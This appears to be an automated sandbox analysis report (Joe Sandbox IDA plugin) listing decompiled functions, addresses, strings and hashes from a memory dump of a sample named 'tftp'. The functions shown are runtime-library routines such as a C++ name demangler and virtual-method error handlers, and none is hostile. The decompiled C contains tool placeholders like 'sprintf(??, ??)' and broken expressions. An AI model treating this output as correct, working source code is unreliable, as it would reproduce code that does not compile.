0x0040a467
0x0040a46a
0x0040a470
0x0040a475
0x0040a477
0x0040a47e
0x0040a47e
0x0040a424
0x0040a42d
0x0040a433
0x0040a436
0x0040a43c
0x00000000
0x00000000
0x0040a43e
0x0040a43e
0x0040a487
0x0040a48b
0x0040a493
0x0040a499
0x0040a49d
0x0040a4a2
0x0040a4a5
0x0040a4ac
0x0040a596
0x0040a4b2
0x0040a4b4
0x0040a4ba
0x0040a4be
0x0040a4dd
0x0040a4e3
0x0040a4e6
0x0040a4c2
0x0040a4e8
0x0040a4ee
0x0040a4f5
0x0040a4f9
0x0040a501
0x0040a505
0x0040a508
0x0040a50e
0x0040a513
0x0040a515
0x0040a51c
0x0040a51c
0x0040a4c5
0x0040a4ca
0x0040a4d0
0x0040a4d3
0x0040a4d9
0x00000000
0x00000000
0x0040a4db
0x0040a4db
0x0040a522
0x0040a522
0x0040a52b
0x0040a552
0x0040a557
0x0040a55a
0x0040a52f
0x0040a55c
0x0040a562
0x0040a569
0x0040a56d
0x0040a575
0x0040a579
0x0040a57c
0x0040a582
0x0040a587
0x0040a589
0x0040a590
0x0040a590
0x0040a532
0x0040a53b
0x0040a541
0x0040a544
0x0040a54a
0x0040a3b4
0x0040a3b4
0x0040a3b7
0x00000000
0x0040a550
0x0040a550
0x00000000
0x0040a550
0x0040a3c2
0x0040a3ca
0x0040a3cf
0x0040a3dc
0x00000000
0x0040a3dc
0x0040a552
0x0040a3ba
0x0040a3c0
0x00000000
0x00000000
0x00000000
0x0040a28a
0x0040a290
0x0040a295
0x00000000
0x0040a295
0x0040a288
0x0040a283
0x00000000
0x00000000
0x00000000
0x0040a25b
0x00000000
0x0040a243
0x0040a243
0x0040a249
0x00000000
0x0040a241
0x00000000
0x0040a23f
0x00000000

Strings

}::, xrefs: 0040A526
{default arg#, xrefs: 0040A412
%ld, xrefs: 0040A48B

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID:
String ID: %ld${default arg#$}::
API String ID: 0-1725231047
Opcode ID: cc01ae2f102ac8d0adf64f3ddd99a42cfb8baf4e3a6480756de3c110f953d9e8
Instruction ID: 0ab739b7128b7048604368b08e9b7b299603ec4bae9d68b4a36045a6d33ebea9
Opcode Fuzzy Hash: cc01ae2f102ac8d0adf64f3ddd99a42cfb8baf4e3a6480756de3c110f953d9e8
Instruction Fuzzy Hash: 08A16170208741CBC321DF28D4847EABBE1AF94304F14897EE8DA9B381D779A895DB57

Uniqueness

Uniqueness Score: -1.00%

Function 00406DF4, Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00406DF4(signed int* __ebx, void* __ecx, void* __ebp, char* _a4, signed int _a8, signed int _a12, signed int _a16, char _a48) {
				signed int _t87;
				signed int _t90;
				signed int* _t93;
				unsigned int _t97;
				void* _t99;
				signed int _t100;
				signed int _t103;
				signed int* _t108;
				signed int _t112;
				signed int _t113;
				signed int _t118;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int* _t124;
				void* _t126;
				signed int _t127;
				signed int _t130;
				intOrPtr* _t132;
				char* _t134;
				char* _t136;
				signed char* _t138;
				void* _t141;
				signed int** _t142;

				_t108 = __ebx;
				_t130 = _a12;
				E00409A90(__ebx,  *((intOrPtr*)(__ecx + 4)), _t130);
				_t87 = __ebx[0x40];
				if((_t130 & 0x00000004) != 0) {
					if(_t87 == 0xff) {
						__ebx[0x3f] = 0;
						_a4 = 0xff;
						 *_t142 = __ebx;
						_a8 = __ebx[0x43];
						__ebx[0x42]();
						_t122 = 1;
						_t87 = 0;
						__ebx[0x48] = __ebx[0x48] + 1;
					} else {
						_t122 = _t87 + 1;
					}
					_t108[0x40] = _t122;
					 *((char*)(_t108 + _t87)) = 0x2e;
					_t108[0x41] = 0x2e;
					goto L11;
				} else {
					__esi = 0x415a04;
					while(1) {
						__edx =  *__esi & 0x000000ff;
						if(__eax != 0xff) {
							__ecx = __eax + 1;
						} else {
							__eax =  *(__ebx + 0x10c);
							_a16 = __edx;
							 *((char*)(__ebx + 0xff)) = 0;
							_a4 = 0xff;
							_a8 =  *(__ebx + 0x10c);
							 *__esp = __ebx;
							__eax =  *((intOrPtr*)(__ebx + 0x108))();
							__ecx = 1;
							__eax = 0;
							 *((intOrPtr*)(__ebx + 0x120)) =  *((intOrPtr*)(__ebx + 0x120)) + 1;
							__edx = _a16;
						}
						__esi =  &(__esi[1]);
						 *(__ebx + 0x100) = __ecx;
						 *((char*)(__ebx + __eax)) = __dl;
						 *((char*)(__ebx + 0x104)) = __dl;
						if(__esi == 0x415a06) {
							break;
						}
						__eax = __ecx;
					}
					L11:
					_t132 = _a8;
					if( *_t132 == 0x45) {
						_t90 = _t108[0x40];
						_t134 = "{default arg#";
						while(1) {
							_t123 =  *_t134 & 0x000000ff;
							if(_t90 != 0xff) {
								_t112 = _t90 + 1;
							} else {
								_a16 = _t123;
								_t108[0x3f] = 0;
								_a4 = 0xff;
								_a8 = _t108[0x43];
								 *_t142 = _t108;
								_t108[0x42]();
								_t112 = 1;
								_t90 = 0;
								_t108[0x48] = _t108[0x48] + 1;
								_t123 = _a16;
							}
							_t134 =  &(_t134[1]);
							_t108[0x40] = _t112;
							 *(_t108 + _t90) = _t123;
							_t108[0x41] = _t123;
							if(_t134 == 0x415a14) {
								break;
							}
							_t90 = _t112;
						}
						_a4 = "%ld";
						_a8 =  *((intOrPtr*)(_t132 + 8)) + 1;
						_t93 =  &_a48;
						 *_t142 = _t93;
						_a16 = _t93;
						sprintf(??, ??);
						_t124 = _t93;
						do {
							_t113 =  *_t124;
							_t124 =  &(_t124[1]);
							_t97 = _t113 - 0x01010101 &  !_t113 & 0x80808080;
						} while (_t97 == 0);
						_t98 =  ==  ? _t97 >> 0x10 : _t97;
						_t125 =  ==  ?  &(_t124[0]) : _t124;
						_t99 = ( ==  ? _t97 >> 0x10 : _t97) + ( ==  ? _t97 >> 0x10 : _t97);
						asm("sbb edx, 0x3");
						_t126 = ( ==  ?  &(_t124[0]) : _t124) - _a16;
						if(_t126 == 0) {
							_t127 = _t108[0x40];
							L29:
							_t136 = "}::";
							while(1) {
								_t100 =  *_t136 & 0x000000ff;
								if(_t127 != 0xff) {
									_t118 = _t127 + 1;
								} else {
									_a16 = _t100;
									_t108[0x3f] = 0;
									_a4 = 0xff;
									_a8 = _t108[0x43];
									 *_t142 = _t108;
									_t108[0x42]();
									_t118 = 1;
									_t127 = 0;
									_t108[0x48] = _t108[0x48] + 1;
									_t100 = _a16;
								}
								_t136 =  &(_t136[1]);
								_t108[0x40] = _t118;
								 *(_t108 + _t127) = _t100;
								_t108[0x41] = _t100;
								if(_t136 == 0x415a1c) {
									_t132 =  *((intOrPtr*)(_t132 + 4));
									goto L12;
								}
								_t127 = _t118;
							}
						}
						_t138 = _a16;
						_t103 = _t108[0x40];
						_t141 = _t126 + _t138;
						while(1) {
							_t120 =  *_t138 & 0x000000ff;
							if(_t103 != 0xff) {
								_t127 = _t103 + 1;
							} else {
								_a16 = _t120;
								_t108[0x3f] = 0;
								_a4 = 0xff;
								_a8 = _t108[0x43];
								 *_t142 = _t108;
								_t108[0x42]();
								_t127 = 1;
								_t103 = 0;
								_t108[0x48] = _t108[0x48] + 1;
								_t120 = _a16;
							}
							_t138 =  &(_t138[1]);
							_t108[0x40] = _t127;
							 *(_t108 + _t103) = _t120;
							_t108[0x41] = _t120;
							if(_t138 == _t141) {
								goto L29;
							}
							_t103 = _t127;
						}
					}
					L12:
					_t87 = E00409A90(_t108, _t132, _a12);
					return _t87;
				}
			}

0x00406df4
0x00406df4
0x00406dff
0x00406e07
0x00406e0d
0x00407fa3
0x0040952b
0x00409532
0x0040953a
0x0040953d
0x00409541
0x00409547
0x0040954c
0x0040954e
0x00407fa9
0x00407fa9
0x00407fa9
0x00407fac
0x00407fb2
0x00407fb6
0x00000000
0x00406e13
0x00406e13
0x00406e43
0x00406e48
0x00406e4b
0x00406e20
0x00406e4d
0x00406e4d
0x00406e53
0x00406e57
0x00406e5e
0x00406e66
0x00406e6a
0x00406e6d
0x00406e73
0x00406e78
0x00406e7a
0x00406e81
0x00406e81
0x00406e23
0x00406e2c
0x00406e32
0x00406e35
0x00406e3b
0x00000000
0x00000000
0x00406e41
0x00406e41
0x00407fbd
0x00407fbd
0x00407fc3
0x00408ce7
0x00408ced
0x00408d13
0x00408d18
0x00408d1b
0x00408cf4
0x00408d1d
0x00408d23
0x00408d27
0x00408d2e
0x00408d36
0x00408d3a
0x00408d3d
0x00408d43
0x00408d48
0x00408d4a
0x00408d51
0x00408d51
0x00408cf7
0x00408d00
0x00408d06
0x00408d09
0x00408d0f
0x00000000
0x00000000
0x00408d11
0x00408d11
0x00408d5a
0x00408d65
0x00408d69
0x00408d6f
0x00408d72
0x00408d76
0x00408d7b
0x00408d7d
0x00408d7d
0x00408d7f
0x00408d8c
0x00408d8c
0x00408d9d
0x00408da3
0x00408da6
0x00408da8
0x00408dab
0x00408daf
0x00408e1f
0x00408e25
0x00408e25
0x00408e4f
0x00408e55
0x00408e58
0x00408e30
0x00408e5a
0x00408e60
0x00408e64
0x00408e6b
0x00408e73
0x00408e77
0x00408e7a
0x00408e80
0x00408e85
0x00408e87
0x00408e8e
0x00408e8e
0x00408e33
0x00408e3c
0x00408e42
0x00408e45
0x00408e4b
0x00408e94
0x00000000
0x00408e94
0x00408e4d
0x00408e4d
0x00408e4f
0x00408db1
0x00408db5
0x00408dbb
0x00408ddb
0x00408de0
0x00408de3
0x00408dc0
0x00408de5
0x00408deb
0x00408def
0x00408df6
0x00408dfe
0x00408e02
0x00408e05
0x00408e0b
0x00408e10
0x00408e12
0x00408e19
0x00408e19
0x00408dc3
0x00408dc8
0x00408dce
0x00408dd1
0x00408dd7
0x00000000
0x00000000
0x00408dd9
0x00408dd9
0x00408ddb
0x00407fc9
0x00407fd1
0x0040646f
0x0040646f

Strings

}::, xrefs: 00408E25
{default arg#, xrefs: 00408CED
%ld, xrefs: 00408D5A
., xrefs: 00407FB6

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID:
String ID: %ld$.${default arg#$}::
API String ID: 0-2559312452
Opcode ID: e9048e7d3d5cd8b6b18176d7d454f701ea30222dc0d338a2f49d9d692593e160
Instruction ID: b46908c6c946e23a477a144dbb4eba3a3533cd258ad0aaf9ee85a2cb99f16b38
Opcode Fuzzy Hash: e9048e7d3d5cd8b6b18176d7d454f701ea30222dc0d338a2f49d9d692593e160
Instruction Fuzzy Hash: 07710970508282CBC715CF18C0C47A5BBE1AF95304F1889BEECC99F38AD7799885DB66

Uniqueness

Uniqueness Score: -1.00%

Function 004072F8, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 129COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 0040883C

Strings

}, xrefs: 00408902
this, xrefs: 00407309
{parm#, xrefs: 004087B7
%ld, xrefs: 0040882D

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: sprintf
String ID: %ld$this${parm#$}
API String ID: 590974362-1561454167
Opcode ID: 947d38b3e5e3f17ab4a34cf96b25b247f3266169d94eace326e1aa3fcec71141
Instruction ID: 7f3fc45555ce0abb3c93f0ec2945dc7d0161e485de740abc168861158554b1af
Opcode Fuzzy Hash: 947d38b3e5e3f17ab4a34cf96b25b247f3266169d94eace326e1aa3fcec71141
Instruction Fuzzy Hash: 52516A3190C241CBC715DF28C4847A67BE1AF95300F18C9BEECC99F386D7B998849B66

Uniqueness

Uniqueness Score: -1.00%

Function 0040FFD0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E0040FFD0(void* __edx, void* __eflags) {
				intOrPtr _t22;
				intOrPtr _t24;
				intOrPtr _t27;
				int _t28;
				signed int _t29;
				intOrPtr _t31;
				intOrPtr _t36;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t53;
				void* _t62;
				intOrPtr* _t63;
				intOrPtr* _t64;

				 *_t63 =  *((intOrPtr*)(_t63 + 0x50));
				_t62 = E0040DBFC(__edx);
				_t46 = _t63 + 0x20;
				memcpy(_t46, 0x41432c, 4 << 2);
				_t64 = _t63 + 0xc;
				_t22 =  *0x41dae0;
				if(_t22 == 0) {
					_t22 = E0040D1CC();
					 *0x41dae0 = _t22;
				}
				 *_t64 = _t22;
				E00410AC0();
				if(_t62 == 0) {
					L4:
					_t24 =  *0x41dae0;
					if(_t24 == 0) {
						_t24 = E0040D1CC();
						 *0x41dae0 = _t24;
					}
					 *_t64 = _t24;
					E00410634();
					return 3;
				}
				_t27 =  *((intOrPtr*)(_t62 + 0x14));
				if(_t27 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t64 + 4)) = _t64 + 0x1c;
				 *_t64 = _t27;
				_t28 = GetHandleInformation(??, ??);
				_t64 = _t64 - 8;
				if(_t28 == 0) {
					goto L4;
				}
				_t29 =  *(_t62 + 0x24);
				if((_t29 & 0x00000004) == 0) {
					_t53 =  *((intOrPtr*)(_t62 + 0x14));
					 *((intOrPtr*)(_t62 + 0x14)) = 0;
					 *(_t62 + 0x24) = _t29 | 0x00000004;
					asm("lock or dword [esp], 0x0");
					if(_t53 != 0) {
						 *_t64 = _t53;
						_push(CloseHandle(??));
						if( *((intOrPtr*)(_t62 + 0x70)) != 0) {
							_t36 =  *((intOrPtr*)(_t62 + 0x18));
							if(_t36 != 0) {
								 *_t64 = _t36;
								CloseHandle(??);
								_push(0x414334);
							}
							 *((intOrPtr*)(_t62 + 0x18)) = 0;
							_t16 = _t62 + 0x1c; // 0x1c
							 *_t64 = _t16;
							E00410BB4(0);
							_t17 = _t62 + 0x34; // 0x34
							memcpy(_t17, _t46, 4 << 2);
							_t64 = _t64 + 0xc;
							E0040D3AC(_t62, _t53);
						}
					}
					_t31 =  *0x41dae0;
					if(_t31 == 0) {
						_t31 = E0040D1CC();
						 *0x41dae0 = _t31;
					}
					 *_t64 = _t31;
					E00410634();
					return 0;
				}
				_t43 =  *0x41dae0;
				if(_t43 == 0) {
					_t43 = E0040D1CC();
					 *0x41dae0 = _t43;
				}
				 *_t64 = _t43;
				E00410634();
				return 0x16;
			}

0x0040ffdb
0x0040ffe3
0x0040ffe5
0x0040fff5
0x0040fff5
0x0040fff7
0x0040fffe
0x00410084
0x00410089
0x00410089
0x00410004
0x00410007
0x0041000e
0x0041002e
0x0041002e
0x00410035
0x00410078
0x0041007d
0x0041007d
0x00410037
0x0041003a
0x00000000
0x0041003f
0x00410010
0x00410015
0x00000000
0x00000000
0x0041001b
0x0041001f
0x00410022
0x00410027
0x0041002c
0x00000000
0x00000000
0x0041004c
0x00410051
0x00410094
0x00410097
0x004100a1
0x004100a4
0x004100ab
0x004100ad
0x004100b5
0x004100bb
0x004100bd
0x004100c2
0x004100c4
0x004100c7
0x004100cc
0x004100cc
0x004100cd
0x004100d4
0x004100d7
0x004100da
0x004100df
0x004100e9
0x004100e9
0x004100ed
0x004100ed
0x004100bb
0x004100f2
0x004100f9
0x0041011b
0x00410120
0x00410120
0x004100fb
0x004100fe
0x00000000
0x00410103
0x00410053
0x0041005a
0x0041010c
0x00410111
0x00410111
0x00410060
0x00410063
0x00410074

APIs

GetHandleInformation.KERNEL32 ref: 00410022
CloseHandle.KERNEL32 ref: 004100B0
CloseHandle.KERNEL32(00000000), ref: 004100C7

Strings

,CA, xrefs: 0040FFE9

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: Handle$Close$Information
String ID: ,CA
API String ID: 279656618-345574230
Opcode ID: a11894bd9a059a010a1d202c63a6af8ae76ec0b247429fc8d36aec2819ded817
Instruction ID: ca352fb2126679cca38bc3ac0e19710b1a916e244613c9ceb3eb9720ee9112f5
Opcode Fuzzy Hash: a11894bd9a059a010a1d202c63a6af8ae76ec0b247429fc8d36aec2819ded817
Instruction Fuzzy Hash: F73119B0A042058BDB10EF75E84179B7BE4AF44384F01483EA885DB251EBB9D8C5DB6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C8C0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040C8C0(intOrPtr _a4) {
				char _v16;
				char* _v36;
				intOrPtr _v40;
				intOrPtr* _t13;
				char* _t16;
				intOrPtr* _t17;
				intOrPtr* _t18;
				char _t19;
				intOrPtr _t20;
				void* _t21;
				char** _t23;
				intOrPtr _t25;
				void* _t26;
				intOrPtr* _t27;
				void* _t29;
				char** _t32;

				_t32 =  &_v36;
				_t27 =  *0x41dab8;
				_t25 = _a4;
				if(_t27 == 0) {
					_v36 = E0040BC00;
					_v40 = 4;
					 *_t32 = "use_fc_key";
					_t13 = E0040CD30(__eflags);
					 *0x41dab8 = _t13;
					_t27 = _t13;
				}
				if( *_t27 < 0) {
					E0040BD60();
				}
				_t28 =  *0x41dab8;
				if(_t28 == 0) {
					_v36 = E0040BC00;
					_v40 = 4;
					 *_t32 = "use_fc_key";
					_t16 = E0040CD30(__eflags);
					 *0x41dab8 = _t16;
					_t28 = _t16;
				}
				if( *_t28 == 0) {
					L10:
					_t17 =  *0x41dac0;
					if(_t17 == 0) {
						_v36 = 0;
						_v40 = 4;
						 *_t32 = "fc_static";
						_t18 = E0040CD30(__eflags);
						 *0x41dac0 = _t18;
						_t19 =  *_t18;
					} else {
						_t19 =  *_t17;
					}
					goto L6;
				} else {
					_t23 =  *0x41dabc;
					_t37 = _t23;
					if(_t23 == 0) {
						L14:
						_v36 = 0;
						_v40 = 4;
						 *_t32 = "fc_key";
						_t23 = E0040CD30(__eflags);
						 *0x41dabc = _t23;
					}
					 *_t32 =  *_t23;
					_t19 = E0040E840(_t26, _t28, _t37);
					L6:
					_v16 = _t19;
					_t20 = _t25;
					_t25 =  *((intOrPtr*)(_t25 + 0xc));
					_t31 =  &_v16;
					_t28 =  &_v16;
					if(_t25 != 0) {
						_t21 = E0040BF50(_t20,  &_v16);
					} else {
						_t21 = E0040BCB0(_t20, _t25,  &_v16, _t29, _t31);
					}
					if(_t21 == 7) {
						E0040BE20();
						goto L14;
					} else {
						abort();
						goto L10;
					}
				}
			}

0x0040c8c2
0x0040c8c5
0x0040c8cb
0x0040c8d1
0x0040c976
0x0040c97e
0x0040c986
0x0040c98d
0x0040c992
0x0040c997
0x0040c997
0x0040c8db
0x0040c96c
0x0040c96c
0x0040c8e1
0x0040c8e9
0x0040c99e
0x0040c9a6
0x0040c9ae
0x0040c9b5
0x0040c9ba
0x0040c9bf
0x0040c9bf
0x0040c8f3
0x0040c92a
0x0040c92a
0x0040c931
0x0040c9c6
0x0040c9ce
0x0040c9d6
0x0040c9dd
0x0040c9e2
0x0040c9e7
0x0040c937
0x0040c937
0x0040c937
0x00000000
0x0040c8f5
0x0040c8f5
0x0040c8fa
0x0040c8fc
0x0040c949
0x0040c949
0x0040c951
0x0040c959
0x0040c960
0x0040c965
0x0040c965
0x0040c900
0x0040c903
0x0040c908
0x0040c908
0x0040c90c
0x0040c90e
0x0040c911
0x0040c915
0x0040c919
0x0040c93b
0x0040c91b
0x0040c91b
0x0040c91b
0x0040c923
0x0040c944
0x00000000
0x0040c925
0x0040c925
0x00000000
0x0040c925
0x0040c923

APIs

abort.MSVCRT ref: 0040C925

Strings

use_fc_key, xrefs: 0040C986, 0040C9AE
fc_static, xrefs: 0040C9D6
fc_key, xrefs: 0040C959

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: abort
String ID: fc_key$fc_static$use_fc_key
API String ID: 4206212132-2840716747
Opcode ID: 3d24b95447821818e41abb329e8aacb30a08eb91a8797d2df8da2d5ae7754c0f
Instruction ID: 5bfe838c67e519317257a27511c3af7e59e5d885a5e03edad05a35dd155c015f
Opcode Fuzzy Hash: 3d24b95447821818e41abb329e8aacb30a08eb91a8797d2df8da2d5ae7754c0f
Instruction Fuzzy Hash: 1621D6F0A08201DFD710EF25C4C065A7BE0AF44748F15C93EE585AB295D77C98869B9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9F0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E0040C9F0(char* _a4) {
				char _v16;
				intOrPtr _v36;
				char* _v40;
				intOrPtr* _t16;
				intOrPtr* _t19;
				intOrPtr* _t21;
				intOrPtr* _t22;
				char _t23;
				char** _t27;
				char* _t29;
				void* _t30;
				char** _t32;

				_t32 =  &_v40;
				_t29 = _a4;
				if(_t29[0xc] == 0) {
					L9:
					 *_t32 = _t29;
					return E0040C5E0(_t30, _t31);
				}
				_t16 =  *0x41dab8;
				if(_t16 == 0) {
					L14:
					_v36 = E0040BC00;
					_v40 = 4;
					 *_t32 = "use_fc_key";
					_t16 = E0040CD30(__eflags);
					 *0x41dab8 = _t16;
				}
				if( *_t16 < 0) {
					E0040BD60();
				}
				_t19 =  *0x41dab8;
				if(_t19 == 0) {
					_v36 = E0040BC00;
					_v40 = 4;
					 *_t32 = "use_fc_key";
					_t19 = E0040CD30(__eflags);
					 *0x41dab8 = _t19;
				}
				if( *_t19 == 0) {
					_t21 =  *0x41dac0;
					__eflags = _t21;
					if(__eflags == 0) {
						_v36 = 0;
						_v40 = 4;
						 *_t32 = "fc_static";
						_t22 = E0040CD30(__eflags);
						 *0x41dac0 = _t22;
						_t23 =  *_t22;
					} else {
						_t23 =  *_t21;
					}
				} else {
					_t27 =  *0x41dabc;
					_t38 = _t27;
					if(_t27 == 0) {
						_v36 = 0;
						_v40 = 4;
						 *_t32 = "fc_key";
						_t27 = E0040CD30(__eflags);
						 *0x41dabc = _t27;
					}
					 *_t32 =  *_t27;
					_t23 = E0040E840(_t30, _t31, _t38);
				}
				_v16 = _t23;
				_t31 =  &_v16;
				if(E0040BF50(_t29,  &_v16) == 7) {
					E0040BE20();
					goto L14;
				} else {
					abort();
					goto L9;
				}
			}

0x0040c9f1
0x0040c9f4
0x0040c9fd
0x0040ca51
0x0040ca51
0x0040ca5d
0x0040ca5d
0x0040c9ff
0x0040ca06
0x0040ca80
0x0040ca80
0x0040ca88
0x0040ca90
0x0040ca97
0x0040ca9c
0x0040ca9c
0x0040ca0c
0x0040ca70
0x0040ca70
0x0040ca0e
0x0040ca15
0x0040caa6
0x0040caae
0x0040cab6
0x0040cabd
0x0040cac2
0x0040cac2
0x0040ca1f
0x0040ca60
0x0040ca65
0x0040ca67
0x0040cad0
0x0040cad8
0x0040cae0
0x0040cae7
0x0040caec
0x0040caf1
0x0040ca69
0x0040ca69
0x0040ca69
0x0040ca21
0x0040ca21
0x0040ca26
0x0040ca28
0x0040caf8
0x0040cb00
0x0040cb08
0x0040cb0f
0x0040cb14
0x0040cb14
0x0040ca30
0x0040ca33
0x0040ca33
0x0040ca38
0x0040ca3c
0x0040ca4a
0x0040ca7b
0x00000000
0x0040ca4c
0x0040ca4c
0x00000000
0x0040ca4c

APIs

abort.MSVCRT ref: 0040CA4C

Strings

use_fc_key, xrefs: 0040CA90, 0040CAB6
fc_static, xrefs: 0040CAE0
fc_key, xrefs: 0040CB08

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: abort
String ID: fc_key$fc_static$use_fc_key
API String ID: 4206212132-2840716747
Opcode ID: 24bdfd1de6777090e581595a08f01b605c1bb5ed5c1cac866032b63378041794
Instruction ID: 35abb840670e91ea5beb184838aa4a8960195ac65cb2869049b311335e95f7bb
Opcode Fuzzy Hash: 24bdfd1de6777090e581595a08f01b605c1bb5ed5c1cac866032b63378041794
Instruction Fuzzy Hash: D021A5B0608209DFD700EF25D8C075A7BE0AF41784F14893EE585AB291D77CD8859FAE

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6B9, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0040B6A0
VirtualProtect.KERNEL32 ref: 0040B6E4
memcpy.MSVCRT ref: 0040B70B
VirtualProtect.KERNEL32 ref: 0040B739

Strings

@, xrefs: 0040B6D1

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: ProtectVirtualmemcpy
String ID: @
API String ID: 4237922067-2766056989
Opcode ID: 596edfd8cbbab0b13c24723feca50b1bb86eca966108a21f8cbc7e4a687b487a
Instruction ID: 0c24efdfe4e2a2b486839e1a6896de08d3f0442f83780f96ca25d44720f1e141
Opcode Fuzzy Hash: 596edfd8cbbab0b13c24723feca50b1bb86eca966108a21f8cbc7e4a687b487a
Instruction Fuzzy Hash: CA1193B48083859BD700DF29C18461EFBE0AB88748F448C5EF4D997251D638EA54CB47

Uniqueness

Uniqueness Score: -1.00%

Function 00403580, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403580(intOrPtr* __ecx) {
				intOrPtr _v20;
				char* _v24;
				intOrPtr _v48;
				char* _v52;
				void* _t5;
				void* _t7;
				intOrPtr* _t8;

				_t8 = _t7 - 0x1c;
				_v20 = 0x1b;
				_v24 = "pure virtual method called\n";
				 *_t8 = 2;
				L0040CEF0();
				E004029E0();
				_v48 = 0x1e;
				_v52 = "deleted virtual method called\n";
				 *((intOrPtr*)(_t8 - 0x1c)) = 2;
				L0040CEF0();
				E004029E0();
				0;
				0;
				 *__ecx = 0x417308;
				return _t5;
			}

0x00403580
0x00403583
0x0040358b
0x00403593
0x0040359a
0x0040359f
0x004035b3
0x004035bb
0x004035c3
0x004035ca
0x004035cf
0x004035da
0x004035de
0x004035e0
0x004035e6

APIs

_write.MSVCRT ref: 0040359A
_write.MSVCRT ref: 004035CA

Strings

pure virtual method called, xrefs: 0040358B
deleted virtual method called, xrefs: 004035BB

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: _write
String ID: deleted virtual method called$pure virtual method called
API String ID: 4149450435-2754666395
